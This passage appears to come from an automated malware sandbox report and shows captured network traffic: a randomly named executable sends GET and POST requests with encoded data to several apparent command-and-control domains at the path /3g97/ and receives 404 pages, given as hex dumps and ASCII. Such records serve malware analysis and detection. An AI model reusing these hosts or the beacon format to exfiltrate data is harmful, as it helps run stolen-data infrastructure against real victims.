73 56 65 53 51 6c 4b 35 39 6c 58 6c 66 6b 62 45 78 53 4b 49 6b 4f 59 48 41 79 64 50 32 6b 75 67 36 75 64 76 4d 4e 39 64 77 57 59 6c 47 58 5a 39 63 41 65 42 2b 63 34 39 4c 4e 32 51 75 6b 41 2f 2f 66 41 41 4e 52 4a 6e 4e 70 32 71 70 30 39 43 46 6d 38 58 6b 52 67 50 6e 56 50
                                                                                              Data Ascii: 12l42=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
                                                                                              Apr 24, 2024 07:27:08.252882004 CEST533INHTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:27:08 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              12192.168.2.449753203.161.46.103801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:27:10.777631998 CEST455OUTGET /3g97/?AlB=sdJPX&12l42=meGryHO7z/6rT923FBL9q9LP9fsOajdjArpVhNvG0WuyKOeyc4yYaP5CwAgWJzIE3e4WxKJNZpro8/ttq32sXWhgj4qMLx7ltRSWVCmHVfZWVpKDtZXBa18= HTTP/1.1
                                                                                              Host: www.heldhold.life
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Apr 24, 2024 07:27:10.956478119 CEST548INHTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:27:10 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              13192.168.2.449754162.240.81.18801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:27:16.511687040 CEST749OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.tavernadoheroi.store
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.tavernadoheroi.store
                                                                                              Referer: http://www.tavernadoheroi.store/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 76 38 61 4a 36 71 78 45 44 34 57 74 43 55 78 54 48 69 4f 41 56 65 6e 54 42 4f 41 2b 53 6c 36 6f 4e 31 4a 4f 2f 66 32 57 6f 58 32 38 47 64 47 4e 36 54 4a 4f 33 31 47 49 71 48 61 79 30 43 59 6b 6f 43 38 4a 2f 50 74 6a 59 6a 73 73 63 41 45 4e 64 4b 4f 30 7a 74 70 50 75 63 53 45 53 75 53 42 4d 78 52 2b 4c 7a 32 78 51 68 46 77 35 57 34 74 6e 7a 36 56 76 63 72 32 61 78 46 4c 51 67 38 74 72 68 43 5a 74 72 4d 58 6d 70 76 30 36 2b 75 50 6d 30 66 30 79 77 64 31 55 51 46 38 5a 49 66 66 54 62 42 42 67 77 61 75 62 79 56 62 68 62 6c 38 37 30 57 50 6f 7a 49 5a 79 69 54 76 41 4f 78 4e 47 41 3d 3d
                                                                                              Data Ascii: 12l42=v8aJ6qxED4WtCUxTHiOAVenTBOA+Sl6oN1JO/f2WoX28GdGN6TJO31GIqHay0CYkoC8J/PtjYjsscAENdKO0ztpPucSESuSBMxR+Lz2xQhFw5W4tnz6Vvcr2axFLQg8trhCZtrMXmpv06+uPm0f0ywd1UQF8ZIffTbBBgwaubyVbhbl870WPozIZyiTvAOxNGA==
                                                                                              Apr 24, 2024 07:27:16.690617085 CEST1289INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.1
                                                                                              Date: Wed, 24 Apr 2024 05:27:16 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 3650
                                                                                              Connection: close
                                                                                              ETag: "636d2d22-e42"
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                              Apr 24, 2024 07:27:16.690632105 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                                                                              Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                              Apr 24, 2024 07:27:16.690645933 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                                                                              Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              14192.168.2.449755162.240.81.18801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:27:20.740777016 CEST769OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.tavernadoheroi.store
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.tavernadoheroi.store
                                                                                              Referer: http://www.tavernadoheroi.store/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 76 38 61 4a 36 71 78 45 44 34 57 74 42 30 68 54 46 44 4f 41 45 4f 6e 51 45 4f 41 2b 5a 46 36 30 4e 31 46 4f 2f 65 69 47 70 6c 43 38 47 39 32 4e 37 53 4a 4f 77 31 47 49 34 6e 61 33 36 69 59 76 6f 43 77 6e 2f 4b 56 6a 59 6a 51 73 63 46 6f 4e 65 35 6d 33 79 39 70 4e 6d 38 53 47 50 2b 53 42 4d 78 52 2b 4c 77 4b 58 51 6c 70 77 35 6e 49 74 6f 78 53 57 78 4d 72 70 4e 42 46 4c 64 41 38 70 72 68 44 36 74 70 6f 78 6d 71 58 30 36 38 47 50 6e 6c 66 33 70 41 63 77 5a 77 45 6f 49 4a 69 75 64 4f 4d 2f 6f 52 43 67 63 32 42 4c 70 39 30 6d 71 46 33 59 36 7a 73 71 76 6c 61 62 4e 4e 4d 45 64 4a 66 61 6f 35 56 46 71 43 4f 67 62 68 70 6e 48 6c 65 57 64 35 6f 3d
                                                                                              Data Ascii: 12l42=v8aJ6qxED4WtB0hTFDOAEOnQEOA+ZF60N1FO/eiGplC8G92N7SJOw1GI4na36iYvoCwn/KVjYjQscFoNe5m3y9pNm8SGP+SBMxR+LwKXQlpw5nItoxSWxMrpNBFLdA8prhD6tpoxmqX068GPnlf3pAcwZwEoIJiudOM/oRCgc2BLp90mqF3Y6zsqvlabNNMEdJfao5VFqCOgbhpnHleWd5o=
                                                                                              Apr 24, 2024 07:27:20.921850920 CEST1289INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.1
                                                                                              Date: Wed, 24 Apr 2024 05:27:20 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 3650
                                                                                              Connection: close
                                                                                              ETag: "636d2d22-e42"
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 